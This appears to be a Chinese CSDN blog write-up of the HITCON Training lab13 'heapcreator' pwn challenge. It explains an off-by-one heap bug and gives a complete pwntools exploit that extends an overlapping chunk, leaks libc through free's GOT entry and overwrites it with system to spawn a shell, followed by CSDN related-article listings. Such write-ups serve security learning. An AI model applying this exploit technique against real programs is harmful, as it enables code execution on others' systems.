堆利用之chunk extend: HITCON tranining lab13

最新推荐文章于 2024-06-21 20:56:56 发布
最新推荐文章于 2024-06-21 20:56:56 发布
阅读量2.5k 收藏
点赞数
分类专栏: PWN 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122539760
版权

64位ida分析程序,常见的目录结构;

通过静态分析 发现 edit 的时候 存在 off-by-one 漏洞:

红框标出的地方,可以多输入一个字节。

先看exp: 

from pwn import*
p = process("./heapcreator")
e = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def create(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap :")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
def edit(index,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Content of heap :")
	p.sendline(content)
	p.recvline()
def show(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
def delete(index):
	p.recvuntil(":")
	p.sendline("4")
	p.recvuntil(":")
	p.sendline(str(index))
def exit():
	p.recvuntil(":")
	p.sendline("5")

create(24,'amazh')#0x18 + 0x10
create(16,'amazh')#0x10 + 0x10
edit(0,'/bin/sh\x00' +'a'*0x10+ '\x41')
delete(1)
create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(e.got['free'])) 
show(1)
p.recvuntil("Content : ")
data = p.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
#log.success(hex(free_data)
libc_base  = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1, p64(system_addr))
#pause()
delete(0)

p.interactive()

解题思路:

首先创建了两个heap,大小分别是 0x18和 0x10,我们可以通过编辑heap0的content,从而溢出一个字节,来控制heap1 header的size位,从而实现extend。

extend之后 ,进行free(heap1) , 我们可以得到一个 0x41大小的chunk,然后我们再次malloc这个chunk 写入got地址 便可以泄露出free函数的真实地址  ,随后便可以实现任意写了。

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【逆向学习记录】分配中chunk&bins
卦星的专栏
03-23 3273
1 概述 学习的过程中,开始的时候,有个很难理解的东西,那个东西就是malloc,涉及到malloc就会涉及到chunk,实话说chunk这个东西的学习,确实经历了不少时间,总结一下,防止忘记 参考 Linux内存管理深入分析-上这篇文章详细将来chunk的进化过程,这里就不在深入查看了,深入浅出,是学习溢出基础的佳作 Linux内存管理深入分析-下这篇文章详细讲了bin的结构,并且被我大...
漏洞利用chunk扩展和重叠1
08-04
漏洞利用chunk扩展和重叠1》 漏洞利用是网络安全领域中的一个重要话题,涉及到内存管理的深层次理解和技巧。本文主要探讨了在Linux环境下,如何利用glibc库中的内存分配机制,特别是chunk扩展和重叠现象,...
Chunk Extend/Overlapping | 拓展、重叠
SkYe's Blog
08-06 1613
拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4662
这是进入领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解的基础知识后有没有自己想过在中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 601
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 982
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建函数看数据结构 结构...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 719
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个块,分别是存放两个函数指针的8字节块和存放内容的块 这个示意图很清楚: ...
munmap_chunk(): invalid pointer:
weixin_35755188的博客
02-13 5591
这个错误消息通常表示程序试图释放一个无效的内存地址。“munmap_chunk”是指程序正在使用 munmap 函数释放内存,但发现了一个非法的指针,即不是一个有效的内存块地址。这可能是由于多次释放同一内存块导致的,或者是由于程序尝试释放一个未分配的内存块。在任何情况下,这都是一个严重的错误,需要立即修复。 ...
windowsland:HITCON CTF 2018
03-19
这个想法是利用Windows用户模式中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的字符串输入都不以NULL字节结尾,例如human->name , teacher...
read-chunk:从文件中读取大块
05-26
$ npm install read-chunk 用法 const readChunk = require ( 'read-chunk' ) ; // foo.txt => hello readChunk . sync ( 'foo.txt' , 1 , 3 ) ; //=> 'ell' 原料药 readChunk(filePath,startPosition,长度) ...
promise-chunk:分块运行本机承诺列表
04-10
import promiseChunk from '@myrotvorets/promise-chunk' function * requestGenerator ( ) : Generator < Promise> > > { const ids = [ '81e' , 'a46' , 'SQIzfUkYJ' , 'JFPROfGtQ' , 'g-gQiPV-_' ] for ( let ...
玩转-漏洞的利用技巧.docx
01-10
溢出的利用思想是破坏内存管理的相关数据结构,如 arena、bin、chunk,或者破坏内存中的用户数据,如覆盖变量指针、函数指针、数据等。溢出的防护方法包括保护内存管理相关的数据结构,如 Heap Canary、对...
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1318
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux开发讲课7---Linux sysfs文件系统
最新发布
qq_42837317的博客
06-21 1033
Sysfs通过文件和目录的方式组织信息,其中每个文件或目录对应于系统中的一个设备、驱动程序或者其他内核对象。当内核中的设备、驱动程序等对象被创建时,相应的Kobject也会被创建,然后通过Sysfs将其信息暴露给用户空间。Sysfs通常被挂载在/sys目录下,它提供了一种方便的方式,让用户空间的程序可以动态地获取和管理系统中的设备信息,而无需直接访问内核数据结构。(2)创建sysfs文件。其中attr表示将要创建的文件(属性),而show和store分别表示对应的sysfs文件在读和写操作时的回调函数。
Linux-安装及管理程序
A6985HG的博客
06-19 722
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。
Linux实时查看Java接口数据
m0_72958694的博客
06-19 859
本文详细介绍了如何在Linux环境中结合Java Spring Boot应用程序和Python脚本来实时(或定期)查看Java接口的数据。
linux 登录ftp报Received message too long 1416128883
weixin_47139678的博客
06-20 248
linux 登录ftp报Received message too long 1416128883。
Linux 6.10也引进了蓝屏机制
bugsycrack的博客
06-19 224
Linux 6.10 还在开发之中,最新版本是 rc4,扩展 DRM Panic 支持的工作还在进行之中。未来在运行 Linux 6.10+ 的平台上,如果驱动支持 DRM Panic,那么就可以通过 echo c > /proc/sysrq-trigger 测试 Linux 版本的“蓝屏死机(BSOD)”。Linux 6.10 引入了一个新的 DRM Panic 处理程序基础设施,以便于在致命错误(Panic)发生时显示相关信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值